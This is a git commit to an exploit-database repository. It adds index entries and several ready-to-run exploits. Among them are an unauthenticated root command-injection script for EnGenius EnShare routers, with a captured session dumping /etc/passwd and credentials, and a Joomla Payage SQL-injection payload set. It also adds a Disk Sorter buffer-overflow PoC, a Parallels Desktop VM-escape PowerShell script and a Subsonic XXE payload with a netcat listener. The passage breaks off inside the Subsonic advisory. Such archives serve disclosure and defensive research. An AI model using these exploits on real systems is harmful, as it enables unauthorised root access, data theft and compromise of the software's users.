DB: 2017-06-06
11 new exploits Disk Sorter 9.7.14 - 'Input Directory' Local Buffer Overflow DNSTracer 1.8.1 - Buffer Overflow Parallels Desktop - Virtual Machine Escape Subsonic 6.1.1 - XML External Entity Injection BIND 9.10.5 - Unquoted Service Path Privilege Escalation Cisco Catalyst 2960 IOS 12.2(55)SE1 - 'ROCEM' Remote Code Execution Joomla! Component Payage 2.05 - 'aid' Parameter SQL Injection EnGenius EnShare IoT Gigabit Cloud Service 1.4.11 - Remote Code Execution Subsonic 6.1.1 - Cross-Site Request Forgery Subsonic 6.1.1 - Server-Side Request Forgery Subsonic 6.1.1 - Cross-Site Request Forgery / Cross-Site Scripting
This commit is contained in:
parent
42e94b4366
commit
cd6e21e600
12 changed files with 813 additions and 1 deletions
12
files.csv
12
files.csv
|
@ -5526,6 +5526,8 @@ id,file,description,date,author,platform,type,port
|
||||||
42104,platforms/multiple/dos/42104.js,"WebKit JSC - Incorrect Check in emitPutDerivedConstructorToArrowFunctionContextScope",2017-06-01,"Google Security Research",multiple,dos,0
|
42104,platforms/multiple/dos/42104.js,"WebKit JSC - Incorrect Check in emitPutDerivedConstructorToArrowFunctionContextScope",2017-06-01,"Google Security Research",multiple,dos,0
|
||||||
42108,platforms/multiple/dos/42108.html,"WebKit - 'Element::setAttributeNodeNS' Use-After-Free",2017-06-01,"Google Security Research",multiple,dos,0
|
42108,platforms/multiple/dos/42108.html,"WebKit - 'Element::setAttributeNodeNS' Use-After-Free",2017-06-01,"Google Security Research",multiple,dos,0
|
||||||
42110,platforms/linux/dos/42110.txt,"reiserfstune 3.6.25 - Local Buffer Overflow",2017-06-02,"Nassim Asrir",linux,dos,0
|
42110,platforms/linux/dos/42110.txt,"reiserfstune 3.6.25 - Local Buffer Overflow",2017-06-02,"Nassim Asrir",linux,dos,0
|
||||||
|
42112,platforms/windows/dos/42112.py,"Disk Sorter 9.7.14 - 'Input Directory' Local Buffer Overflow",2017-06-02,n3ckD_,windows,dos,0
|
||||||
|
42115,platforms/linux/dos/42115.txt,"DNSTracer 1.8.1 - Buffer Overflow",2017-06-05,FarazPajohan,linux,dos,0
|
||||||
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
|
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
|
||||||
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
|
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
|
||||||
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
|
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
|
||||||
|
@ -9024,6 +9026,9 @@ id,file,description,date,author,platform,type,port
|
||||||
42059,platforms/windows/local/42059.py,"Dup Scout Enterprise 9.7.18 - '.xml' Local Buffer Overflow",2017-05-24,ScrR1pTK1dd13,windows,local,0
|
42059,platforms/windows/local/42059.py,"Dup Scout Enterprise 9.7.18 - '.xml' Local Buffer Overflow",2017-05-24,ScrR1pTK1dd13,windows,local,0
|
||||||
42076,platforms/linux/local/42076.py,"JAD java Decompiler 1.5.8e - Local Buffer Overflow",2017-05-26,"Juan Sacco",linux,local,0
|
42076,platforms/linux/local/42076.py,"JAD java Decompiler 1.5.8e - Local Buffer Overflow",2017-05-26,"Juan Sacco",linux,local,0
|
||||||
42077,platforms/windows/local/42077.txt,"Microsoft MsMpEng - Multiple Problems Handling ntdll!NtControlChannel Commands",2017-05-26,"Google Security Research",windows,local,0
|
42077,platforms/windows/local/42077.txt,"Microsoft MsMpEng - Multiple Problems Handling ntdll!NtControlChannel Commands",2017-05-26,"Google Security Research",windows,local,0
|
||||||
|
42116,platforms/windows/local/42116.txt,"Parallels Desktop - Virtual Machine Escape",2017-06-05,"Mohammad Reza Espargham",windows,local,0
|
||||||
|
42119,platforms/windows/local/42119.txt,"Subsonic 6.1.1 - XML External Entity Injection",2017-06-05,hyp3rlinx,windows,local,0
|
||||||
|
42121,platforms/windows/local/42121.txt,"BIND 9.10.5 - Unquoted Service Path Privilege Escalation",2017-06-05,hyp3rlinx,windows,local,0
|
||||||
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
|
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
|
||||||
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
|
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
|
||||||
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
|
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
|
||||||
|
@ -15528,7 +15533,7 @@ id,file,description,date,author,platform,type,port
|
||||||
41852,platforms/windows/remote/41852.txt,"Moxa MX AOPC-Server 1.5 - XML External Entity Injection",2017-04-10,hyp3rlinx,windows,remote,0
|
41852,platforms/windows/remote/41852.txt,"Moxa MX AOPC-Server 1.5 - XML External Entity Injection",2017-04-10,hyp3rlinx,windows,remote,0
|
||||||
41861,platforms/linux/remote/41861.py,"Quest Privilege Manager 6.0.0 - Arbitrary File Write",2017-04-10,m0t,linux,remote,0
|
41861,platforms/linux/remote/41861.py,"Quest Privilege Manager 6.0.0 - Arbitrary File Write",2017-04-10,m0t,linux,remote,0
|
||||||
41872,platforms/hardware/remote/41872.py,"Cisco Catalyst 2960 IOS 12.2(55)SE11 - 'ROCEM' Remote Code Execution",2017-04-12,"Artem Kondratenko",hardware,remote,23
|
41872,platforms/hardware/remote/41872.py,"Cisco Catalyst 2960 IOS 12.2(55)SE11 - 'ROCEM' Remote Code Execution",2017-04-12,"Artem Kondratenko",hardware,remote,23
|
||||||
41874,platforms/hardware/remote/41874.py,"Cisco Catalyst 2960 IOS 12.2(55)SE1 - 'ROCEM' Remote Code Execution",2017-04-12,"Artem Kondratenko",hardware,remote,0
|
42122,platforms/hardware/remote/42122.py,"Cisco Catalyst 2960 IOS 12.2(55)SE1 - 'ROCEM' Remote Code Execution",2017-04-12,"Artem Kondratenko",hardware,remote,23
|
||||||
41892,platforms/linux/remote/41892.sh,"Tenable Appliance < 4.5 - Unauthenticated Root Remote Code Execution",2017-04-18,agix,linux,remote,8000
|
41892,platforms/linux/remote/41892.sh,"Tenable Appliance < 4.5 - Unauthenticated Root Remote Code Execution",2017-04-18,agix,linux,remote,8000
|
||||||
41894,platforms/windows/remote/41894.py,"Microsoft Word - '.RTF' Remote Code Execution",2017-04-18,"Bhadresh Patel",windows,remote,0
|
41894,platforms/windows/remote/41894.py,"Microsoft Word - '.RTF' Remote Code Execution",2017-04-18,"Bhadresh Patel",windows,remote,0
|
||||||
41895,platforms/hardware/remote/41895.rb,"Huawei HG532n - Command Injection (Metasploit)",2017-04-19,Metasploit,hardware,remote,0
|
41895,platforms/hardware/remote/41895.rb,"Huawei HG532n - Command Injection (Metasploit)",2017-04-19,Metasploit,hardware,remote,0
|
||||||
|
@ -37942,3 +37947,8 @@ id,file,description,date,author,platform,type,port
|
||||||
42105,platforms/multiple/webapps/42105.html,"WebKit - CachedFrame does not Detach Openers Universal Cross-Site Scripting",2017-06-01,"Google Security Research",multiple,webapps,0
|
42105,platforms/multiple/webapps/42105.html,"WebKit - CachedFrame does not Detach Openers Universal Cross-Site Scripting",2017-06-01,"Google Security Research",multiple,webapps,0
|
||||||
42106,platforms/multiple/webapps/42106.html,"WebKit - 'CachedFrameBase::restore' Universal Cross-Site Scripting",2017-06-01,"Google Security Research",multiple,webapps,0
|
42106,platforms/multiple/webapps/42106.html,"WebKit - 'CachedFrameBase::restore' Universal Cross-Site Scripting",2017-06-01,"Google Security Research",multiple,webapps,0
|
||||||
42107,platforms/multiple/webapps/42107.html,"WebKit - 'Document::prepareForDestruction' and 'CachedFrame' Universal Cross-Site Scripting",2017-06-01,"Google Security Research",multiple,webapps,0
|
42107,platforms/multiple/webapps/42107.html,"WebKit - 'Document::prepareForDestruction' and 'CachedFrame' Universal Cross-Site Scripting",2017-06-01,"Google Security Research",multiple,webapps,0
|
||||||
|
42113,platforms/php/webapps/42113.txt,"Joomla! Component Payage 2.05 - 'aid' Parameter SQL Injection",2017-06-03,"Persian Hack Team",php,webapps,0
|
||||||
|
42114,platforms/hardware/webapps/42114.py,"EnGenius EnShare IoT Gigabit Cloud Service 1.4.11 - Remote Code Execution",2017-06-04,LiquidWorm,hardware,webapps,0
|
||||||
|
42117,platforms/windows/webapps/42117.txt,"Subsonic 6.1.1 - Cross-Site Request Forgery",2017-06-05,hyp3rlinx,windows,webapps,0
|
||||||
|
42118,platforms/windows/webapps/42118.txt,"Subsonic 6.1.1 - Server-Side Request Forgery",2017-06-05,hyp3rlinx,windows,webapps,0
|
||||||
|
42120,platforms/windows/webapps/42120.txt,"Subsonic 6.1.1 - Cross-Site Request Forgery / Cross-Site Scripting",2017-06-05,hyp3rlinx,windows,webapps,0
|
||||||
|
|
Can't render this file because it is too large.
|
127
platforms/hardware/webapps/42114.py
Executable file
127
platforms/hardware/webapps/42114.py
Executable file
|
@ -0,0 +1,127 @@
|
||||||
|
#!/usr/bin/env python
|
||||||
|
# coding: utf8
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# EnGenius EnShare IoT Gigabit Cloud Service 1.4.11 Root Remote Code Execution
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# Vendor: EnGenius Technologies Inc.
|
||||||
|
# Product web page: https://www.engeniustech.com
|
||||||
|
# Affected version: ESR300 (1.4.9, 1.4.7, 1.4.2, 1.4.1.28, 1.4.0, 1.3.1.42, 1.1.0.28)
|
||||||
|
# ESR350 (1.4.11, 1.4.9, 1.4.5, 1.4.2, 1.4.0, 1.3.1.41, 1.1.0.29)
|
||||||
|
# ESR600 (1.4.11, 1.4.9, 1.4.5, 1.4.3, 1.4.2, 1.4.1, 1.4.0.23, 1.3.1.63, 1.2.1.46, 1.1.0.50)
|
||||||
|
# EPG5000 (1.3.9.21, 1.3.7.20, 1.3.3.17, 1.3.3, 1.3.2, 1.3.0, 1.2.0)
|
||||||
|
# ESR900 (1.4.5, 1.4.3, 1.4.0, 1.3.5.18 build-12032015@liwei (5668b74), 1.3.1.26, 1.3.0, 1.2.2.23, 1.1.0)
|
||||||
|
# ESR1200 (1.4.5, 1.4.3, 1.4.1, 1.3.1.34, 1.1.0)
|
||||||
|
# ESR1750 (1.4.5, 1.4.3, 1.4.1, 1.4.0, 1.3.1.34, 1.3.0, 1.2.2.27, 1.1.0)
|
||||||
|
#
|
||||||
|
# Summary: With the EnGenius IoT Gigabit Routers and free EnShare app, use
|
||||||
|
# your iPhone, iPad or Android-based tablet or smartphone to transfer
|
||||||
|
# video, music and other files to and from a router-attached USB hard
|
||||||
|
# drive. Enshare is a USB media storage sharing application that enables
|
||||||
|
# access to files remotely. The EnShare feature allows you to access media
|
||||||
|
# content stored on a USB hard drive connected to the router's USB port in
|
||||||
|
# the home and when you are away from home when you have access to the Internet.
|
||||||
|
# By default the EnShare feature is enabled.
|
||||||
|
#
|
||||||
|
# EnShareTM supports both FAT32 and NTFS USB formats. Transfer speeds of data
|
||||||
|
# from your router-attached USB storage device to a remote/mobile device may
|
||||||
|
# vary based on Internet uplink and downlink speeds. The router's design enables
|
||||||
|
# users to connect numerous wired and wireless devices to it and supports intensive
|
||||||
|
# applications like streaming HD video and sharing of media in the home and accessing
|
||||||
|
# media away from the home with EnShare - Your Personal Media Cloud.
|
||||||
|
#
|
||||||
|
# Desc: EnGenius EnShare suffers from an unauthenticated command injection
|
||||||
|
# vulnerability. An attacker can inject and execute arbitrary code as the
|
||||||
|
# root user via the 'path' GET/POST parameter parsed by 'usbinteract.cgi'
|
||||||
|
# script.
|
||||||
|
#
|
||||||
|
# =======================================================================
|
||||||
|
#
|
||||||
|
# bash-4.4$ python enshare.py 10.0.0.17
|
||||||
|
# [+] Command: ls -alsh
|
||||||
|
# 44 -rwxr-xr-x 1 0 0 42.5K Oct 31 2014 getsize.cgi
|
||||||
|
# 4 -rwxr-xr-x 1 0 0 606 Oct 31 2014 languageinfo.cgi
|
||||||
|
# 48 -rwxr-xr-x 1 0 0 44.2K Oct 31 2014 upload.cgi
|
||||||
|
# 48 -rwxr-xr-x 1 0 0 44.5K Oct 31 2014 usbinfo.cgi
|
||||||
|
# 56 -rwxr-xr-x 1 0 0 54.1K Oct 31 2014 usbinteract.cgi
|
||||||
|
# 0 drwxr-xr-x 4 0 0 0 Jun 3 00:52 ..
|
||||||
|
# 0 drwxr-xr-x 2 0 0 0 Oct 31 2014 .
|
||||||
|
#
|
||||||
|
# [+] Command: id
|
||||||
|
# uid=0(root) gid=0(root)
|
||||||
|
#
|
||||||
|
# [+] Command: cat /etc/passwd
|
||||||
|
#
|
||||||
|
# Connecting to 10.0.0.17 port 9000
|
||||||
|
#
|
||||||
|
# HTTP/1.1 200 OK
|
||||||
|
# root: !:0:0:root:/root:/bin/sh
|
||||||
|
# administrator: *:65534:65534:administrator:/var:/bin/false
|
||||||
|
# admin: *:60000:60000:webaccount:/home:/usr/bin/sh
|
||||||
|
# guest: *:60001:60000:webaccount:/home:/usr/bin/sh
|
||||||
|
# Content-type: text/html
|
||||||
|
# Transfer-Encoding: chunked
|
||||||
|
# Date: Sat, 03 Jun 2017 13:48:14 GMT
|
||||||
|
# Server: lighttpd/1.4.31
|
||||||
|
#
|
||||||
|
# 0
|
||||||
|
# [+] Command: pwd
|
||||||
|
# /www/web/cgi-bin
|
||||||
|
# [+] Command: cat /etc/account.conf
|
||||||
|
#
|
||||||
|
# HTTP/1.1 200 OK
|
||||||
|
# 1: admin:admin:4
|
||||||
|
# 1: guest:guest:1
|
||||||
|
# Content-type: text/html
|
||||||
|
# Transfer-Encoding: chunked
|
||||||
|
# Date: Sat, 03 Jun 2017 14:53:42 GMT
|
||||||
|
# Server: lighttpd/1.4.31
|
||||||
|
# bash-4.4$
|
||||||
|
#
|
||||||
|
# =======================================================================
|
||||||
|
#
|
||||||
|
# Tested on: Linux 2.6.36 (mips)
|
||||||
|
# Embedded HTTP Server ,Firmware Version 5.11
|
||||||
|
# lighttpd/1.4.31
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||||
|
# @zeroscience
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# Advisory ID: ZSL-2017-5413
|
||||||
|
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5413.php
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# 17.05.2017
|
||||||
|
#
|
||||||
|
|
||||||
|
|
||||||
|
import sys, socket
|
||||||
|
|
||||||
|
if len(sys.argv) < 2:
|
||||||
|
print 'Usage: enshare.py <ip> [port]\n'
|
||||||
|
quit()
|
||||||
|
|
||||||
|
ip = sys.argv[1]
|
||||||
|
port = 9000 if len(sys.argv) < 3 else int(sys.argv[2])
|
||||||
|
cmd = raw_input('[+] Command: ')
|
||||||
|
|
||||||
|
payload = 'POST /web/cgi-bin/usbinteract.cgi HTTP/1.1\r\n'
|
||||||
|
payload += 'Host: {0}:{1}\r\n'
|
||||||
|
payload += 'Content-Length: {2}\r\n'
|
||||||
|
payload += 'Content-Type: application/x-www-form-urlencoded\r\n\r\n'
|
||||||
|
payload += 'action=7&path=\"|{3}||\"'
|
||||||
|
|
||||||
|
msg = payload.format( ip, port, len(cmd)+19, cmd )
|
||||||
|
|
||||||
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||||
|
target = (ip, port)
|
||||||
|
print >>sys.stderr, '\nConnecting to %s port %s\n' % target
|
||||||
|
s.connect(target)
|
||||||
|
s.sendall(msg)
|
||||||
|
response = s.recv(5000)
|
||||||
|
s.close()
|
||||||
|
|
||||||
|
print response.strip()
|
73
platforms/linux/dos/42115.txt
Executable file
73
platforms/linux/dos/42115.txt
Executable file
|
@ -0,0 +1,73 @@
|
||||||
|
################
|
||||||
|
#Exploit Title: DNSTracer Stack-based Buffer Overflow
|
||||||
|
#CVE: CVE-2017-9430
|
||||||
|
#CWE: CWE-119
|
||||||
|
#Exploit Author: Hosein Askari (FarazPajohan)
|
||||||
|
#Vendor HomePage: http://www.mavetju.org
|
||||||
|
#Version : 1.8.1
|
||||||
|
#Tested on: Parrot OS
|
||||||
|
#Date: 04-06-2017
|
||||||
|
#Category: Application
|
||||||
|
#Author Mail : hosein.askari@aol.com
|
||||||
|
#Description: Stack-based buffer overflow in dnstracer through 1.9 allows =
|
||||||
|
attackers to cause a denial of service (application crash) or possibly hav=
|
||||||
|
e unspecified other impact via a command line with a long name argument tha=
|
||||||
|
t is mishandled in a strcpy call for argv[0]. An example threat model is a =
|
||||||
|
web application that launches dnstracer with an untrusted name string.
|
||||||
|
###############################
|
||||||
|
|
||||||
|
#dnstracer -v $(python -c 'print "A"*1025')
|
||||||
|
*** buffer overflow detected ***: dnstracer terminated
|
||||||
|
=3D=3D=3D=3D=3D=3D=3D Backtrace: =3D=3D=3D=3D=3D=3D=3D=3D=3D
|
||||||
|
/lib/x86_64-linux-gnu/libc.so.6(+0x70bcb)[0x7ff6e79edbcb]
|
||||||
|
/lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x37)[0x7ff6e7a76037]
|
||||||
|
/lib/x86_64-linux-gnu/libc.so.6(+0xf7170)[0x7ff6e7a74170]
|
||||||
|
/lib/x86_64-linux-gnu/libc.so.6(+0xf64d2)[0x7ff6e7a734d2]
|
||||||
|
dnstracer(+0x2c8f)[0x5634368aac8f]
|
||||||
|
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf1)[0x7ff6e799d2b1]
|
||||||
|
dnstracer(+0x2fca)[0x5634368aafca]
|
||||||
|
=3D=3D=3D=3D=3D=3D=3D Memory map: =3D=3D=3D=3D=3D=3D=3D=3D
|
||||||
|
5634368a8000-5634368b0000 r-xp 00000000 08:01 4850311 /u=
|
||||||
|
sr/bin/dnstracer
|
||||||
|
563436aaf000-563436ab0000 r--p 00007000 08:01 4850311 /u=
|
||||||
|
sr/bin/dnstracer
|
||||||
|
563436ab0000-563436ab1000 rw-p 00008000 08:01 4850311 /u=
|
||||||
|
sr/bin/dnstracer
|
||||||
|
563436ab1000-563436ab3000 rw-p 00000000 00:00 0=20
|
||||||
|
563436c1d000-563436c3e000 rw-p 00000000 00:00 0 [h=
|
||||||
|
eap]
|
||||||
|
7ff6e7766000-7ff6e777c000 r-xp 00000000 08:01 25823192 /l=
|
||||||
|
ib/x86_64-linux-gnu/libgcc_s.so.1
|
||||||
|
7ff6e777c000-7ff6e797b000 ---p 00016000 08:01 25823192 /l=
|
||||||
|
ib/x86_64-linux-gnu/libgcc_s.so.1
|
||||||
|
7ff6e797b000-7ff6e797c000 r--p 00015000 08:01 25823192 /l=
|
||||||
|
ib/x86_64-linux-gnu/libgcc_s.so.1
|
||||||
|
7ff6e797c000-7ff6e797d000 rw-p 00016000 08:01 25823192 /l=
|
||||||
|
ib/x86_64-linux-gnu/libgcc_s.so.1
|
||||||
|
7ff6e797d000-7ff6e7b12000 r-xp 00000000 08:01 25823976 /l=
|
||||||
|
ib/x86_64-linux-gnu/libc-2.24.so
|
||||||
|
7ff6e7b12000-7ff6e7d11000 ---p 00195000 08:01 25823976 /l=
|
||||||
|
ib/x86_64-linux-gnu/libc-2.24.so
|
||||||
|
7ff6e7d11000-7ff6e7d15000 r--p 00194000 08:01 25823976 /l=
|
||||||
|
ib/x86_64-linux-gnu/libc-2.24.so
|
||||||
|
7ff6e7d15000-7ff6e7d17000 rw-p 00198000 08:01 25823976 /l=
|
||||||
|
ib/x86_64-linux-gnu/libc-2.24.so
|
||||||
|
7ff6e7d17000-7ff6e7d1b000 rw-p 00000000 00:00 0=20
|
||||||
|
7ff6e7d1b000-7ff6e7d3e000 r-xp 00000000 08:01 25823455 /l=
|
||||||
|
ib/x86_64-linux-gnu/ld-2.24.so
|
||||||
|
7ff6e7f13000-7ff6e7f15000 rw-p 00000000 00:00 0=20
|
||||||
|
7ff6e7f3a000-7ff6e7f3e000 rw-p 00000000 00:00 0=20
|
||||||
|
7ff6e7f3e000-7ff6e7f3f000 r--p 00023000 08:01 25823455 /l=
|
||||||
|
ib/x86_64-linux-gnu/ld-2.24.so
|
||||||
|
7ff6e7f3f000-7ff6e7f40000 rw-p 00024000 08:01 25823455 /l=
|
||||||
|
ib/x86_64-linux-gnu/ld-2.24.so
|
||||||
|
7ff6e7f40000-7ff6e7f41000 rw-p 00000000 00:00 0=20
|
||||||
|
7ffded62d000-7ffded64e000 rw-p 00000000 00:00 0 [s=
|
||||||
|
tack]
|
||||||
|
7ffded767000-7ffded769000 r--p 00000000 00:00 0 [v=
|
||||||
|
var]
|
||||||
|
7ffded769000-7ffded76b000 r-xp 00000000 00:00 0 [v=
|
||||||
|
dso]
|
||||||
|
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [v=
|
||||||
|
syscall]
|
||||||
|
Aborted
|
27
platforms/php/webapps/42113.txt
Executable file
27
platforms/php/webapps/42113.txt
Executable file
|
@ -0,0 +1,27 @@
|
||||||
|
# Exploit Title: Joomla Payage 2.05 - SQL Injection
|
||||||
|
# Exploit Author: Persian Hack Team
|
||||||
|
# Discovered by : Mojtaba MobhaM (Mojtaba Kazemi)
|
||||||
|
# Vendor Home : https://extensions.joomla.org/extensions/extension/e-commerce/payment-systems/payage/
|
||||||
|
# My Home : http://persian-team.ir/
|
||||||
|
# Google Dork : inurl:index.php?option=com_payage
|
||||||
|
# Telegram Channel: @PersianHackTeam
|
||||||
|
# Tested on: Linux
|
||||||
|
# Date: 2017-06-03
|
||||||
|
|
||||||
|
# POC :
|
||||||
|
# SQL Injection :
|
||||||
|
|
||||||
|
Parameter: aid (GET)
|
||||||
|
Type: boolean-based blind
|
||||||
|
Title: AND boolean-based blind - WHERE or HAVING clause
|
||||||
|
Payload: option=com_payage&task=make_payment&aid=1001' AND 6552=6552 AND 'dCgx'='dCgx&tid=c4333ccdc8b2dced3f6e72511cd8a76f&tokenid=
|
||||||
|
|
||||||
|
Type: AND/OR time-based blind
|
||||||
|
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
|
||||||
|
Payload: option=com_payage&task=make_payment&aid=1001' AND (SELECT * FROM (SELECT(SLEEP(5)))JBKV) AND 'XFWL'='XFWL&tid=c4333ccdc8b2dced3f6e72511cd8a76f&tokenid=
|
||||||
|
---
|
||||||
|
|
||||||
|
http://server/index.php?option=com_payage&task=make_payment&aid=[SQL]&tid=c4333ccdc8b2dced3f6e72511cd8a76f&tokenid=
|
||||||
|
|
||||||
|
# Greetz : T3NZOG4N & FireKernel
|
||||||
|
# Iranian White Hat Hackers
|
27
platforms/windows/dos/42112.py
Executable file
27
platforms/windows/dos/42112.py
Executable file
|
@ -0,0 +1,27 @@
|
||||||
|
#!/usr/bin/python
|
||||||
|
|
||||||
|
######################################
|
||||||
|
# Exploit Title: DiskSorter v9.7.14 - Input Directory Local Buffer Overflow - PoC
|
||||||
|
# Date: 25 May 2017
|
||||||
|
# Exploit Author: n3ckD_
|
||||||
|
# Vendor Homepage: http://www.disksorter.com/
|
||||||
|
# Software Link: http://www.disksorter.com/setups/disksorter_setup_v9.7.14.exe
|
||||||
|
# Version: Disk Sorter v9.7.14 (32-Bit)
|
||||||
|
# Tested on: Windows 7 Enterprise SP1 (Build 7601)
|
||||||
|
# Usage: Run the exploit, copy the text of the poc.txt into the 'Inputs -> Add Input Directory' dialog
|
||||||
|
######################################
|
||||||
|
|
||||||
|
print "DiskSorter v9.7.14 (32-Bit) - Input Directory Local Buffer Overflow - PoC"
|
||||||
|
print "Copy the text of poc.txt into the 'Inputs -> Add Input Directory' dialog"
|
||||||
|
|
||||||
|
# in libspg:.text
|
||||||
|
# 10147C1C 58 POP EAX
|
||||||
|
# 10147C1D C3 RETN
|
||||||
|
ret = "\x1c\x7c\x14\x10"
|
||||||
|
|
||||||
|
nops = "\x47\x4F"*24
|
||||||
|
buf = nops + "A"*4048 + ret + "MAGIC" + "\n"
|
||||||
|
|
||||||
|
f = open("poc.txt","w")
|
||||||
|
f.write(buf)
|
||||||
|
f.close()
|
57
platforms/windows/local/42116.txt
Executable file
57
platforms/windows/local/42116.txt
Executable file
|
@ -0,0 +1,57 @@
|
||||||
|
#[+] Title: Parallels Desktop - Virtual Machine Escape
|
||||||
|
#[+] Product: Parallels
|
||||||
|
#[+] Vendor: http://www.parallels.com/products/desktop/
|
||||||
|
#[+] Affected Versions: All Version
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# Author : Mohammad Reza Espargham
|
||||||
|
# Linkedin : https://ir.linkedin.com/in/rezasp
|
||||||
|
# E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
|
||||||
|
# Website : www.reza.es
|
||||||
|
# Twitter : https://twitter.com/rezesp
|
||||||
|
# FaceBook : https://www.facebook.com/reza.espargham
|
||||||
|
# Github : github.com/rezasp
|
||||||
|
# youtube : https://youtu.be/_nZ4y0ZTrwA
|
||||||
|
#
|
||||||
|
#
|
||||||
|
|
||||||
|
#There is a security issue in the shared folder implementation in Parallels Desktop
|
||||||
|
#DLL : PrlToolsShellExt.dll 10.2.0 (28956)
|
||||||
|
#prl_tg Driver
|
||||||
|
|
||||||
|
|
||||||
|
#Very simple exploit with powershell
|
||||||
|
#powershell.exe poc.ps1
|
||||||
|
|
||||||
|
#Write OSX Executable file in temp
|
||||||
|
[io.file]::WriteAllText($env:temp + '\r3z4.command',"Say 'You are hacked by 1337'")
|
||||||
|
|
||||||
|
|
||||||
|
add-type -AssemblyName microsoft.VisualBasic
|
||||||
|
|
||||||
|
add-type -AssemblyName System.Windows.Forms
|
||||||
|
|
||||||
|
#open temp in explorer
|
||||||
|
explorer $env:temp
|
||||||
|
|
||||||
|
#wait for 500 miliseconds
|
||||||
|
start-sleep -Milliseconds 500
|
||||||
|
|
||||||
|
#select Temp active window
|
||||||
|
[Microsoft.VisualBasic.Interaction]::AppActivate("Temp")
|
||||||
|
|
||||||
|
#find r3z4.command file
|
||||||
|
[System.Windows.Forms.SendKeys]::SendWait("r3z4")
|
||||||
|
|
||||||
|
#right click
|
||||||
|
[System.Windows.Forms.SendKeys]::SendWait("+({F10})")
|
||||||
|
|
||||||
|
#goto "Open on Mac" in menu
|
||||||
|
[System.Windows.Forms.SendKeys]::SendWait("{DOWN}")
|
||||||
|
[System.Windows.Forms.SendKeys]::SendWait("{DOWN}")
|
||||||
|
[System.Windows.Forms.SendKeys]::SendWait("{DOWN}")
|
||||||
|
|
||||||
|
#Click Enter
|
||||||
|
[System.Windows.Forms.SendKeys]::SendWait("~")
|
||||||
|
|
||||||
|
#Enjoy ;)s
|
102
platforms/windows/local/42119.txt
Executable file
102
platforms/windows/local/42119.txt
Executable file
|
@ -0,0 +1,102 @@
|
||||||
|
[+] Credits: John Page a.k.a hyp3rlinx
|
||||||
|
[+] Website: hyp3rlinx.altervista.org
|
||||||
|
[+] Source: http://hyp3rlinx.altervista.org/advisories/SUBSONIC-XML-EXTERNAL-ENITITY.txt
|
||||||
|
[+] ISR: ApparitionSec
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Vendor:
|
||||||
|
================
|
||||||
|
www.subsonic.org
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Product:
|
||||||
|
===============
|
||||||
|
subsonic v6.1.1
|
||||||
|
|
||||||
|
Subsonic is a media streaming server. You install it on your own computer where you keep your music or video collection.
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability Type:
|
||||||
|
====================
|
||||||
|
XML External Entity
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
CVE Reference:
|
||||||
|
==============
|
||||||
|
CVE-2017-9355
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Security Issue:
|
||||||
|
================
|
||||||
|
subsonic import playlist feature is succeptible to XML External Entity attack. To exploit a User must be tricked to
|
||||||
|
import a malicious .XSPF playlist file. The XXE injection can be used to target various hosts from the internal network
|
||||||
|
to bypass Firewall or from the internet as XML External Entity is related to Server Side Request Forgery (SSRF) attacks.
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Exploit/POC:
|
||||||
|
=============
|
||||||
|
1) Create some playlist file "RainbowsNUnic0rns.xspf"
|
||||||
|
|
||||||
|
<?xml version="1.0"?>
|
||||||
|
<!DOCTYPE mmmmmRaisins [
|
||||||
|
<!ENTITY % mmmm SYSTEM "http://127.0.0.1:1337/">
|
||||||
|
%mmmm;]>
|
||||||
|
|
||||||
|
|
||||||
|
2) Import as playlist.
|
||||||
|
|
||||||
|
|
||||||
|
3) Start listener.
|
||||||
|
|
||||||
|
nc.exe -llvp 1337
|
||||||
|
listening on [any] 1337 ...
|
||||||
|
|
||||||
|
connect to [127.0.0.1] from USER-PC [127.0.0.1] 64428
|
||||||
|
GET / HTTP/1.1
|
||||||
|
Cache-Control: no-cache
|
||||||
|
